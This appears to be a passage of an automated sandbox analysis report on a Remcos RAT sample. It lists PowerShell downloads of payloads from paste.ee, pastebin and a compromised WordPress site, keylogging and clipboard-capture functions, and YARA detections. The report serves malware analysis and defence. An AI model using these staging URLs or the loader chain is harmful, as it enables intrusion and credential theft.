                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,20_2_0041B411
                    Source: global trafficHTTP traffic detected: GET /d/RdlsG/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/b5xuX/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /wp-includes/customize/css/bd.txt HTTP/1.1Host: www.gratitudeseekers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/Ga0HE/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: www.gratitudeseekers.com
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gratitudeseekers.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D7FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gratitudeseekers.com
                    Source: powershell.exe, 00000008.00000002.2365489324.0000015ECE77E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coE
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.2324128930.000001BDAE320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB0F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000004.00000002.3083725979.000001BDC8340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                    Source: powershell.exe, 00000006.00000002.2889045925.000001C1774C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB04D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0502000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Ga0HE/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/RdlsG/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/RdlsG/0P
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/b5xuX/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/b5xuX/0P
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D7F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 0000000D.00000002.2750883006.000001EB653E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/GAC
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D61F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gratitudeseekers.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gratitudeseekers.com/wp-includes/customize/c
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025101D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3114097341.0000025100248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3114097341.0000025100510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 173.231.247.100:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000020_2_0040A2F3
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,20_2_0040A41B
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\1210\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CA73 SystemParametersInfoW,20_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
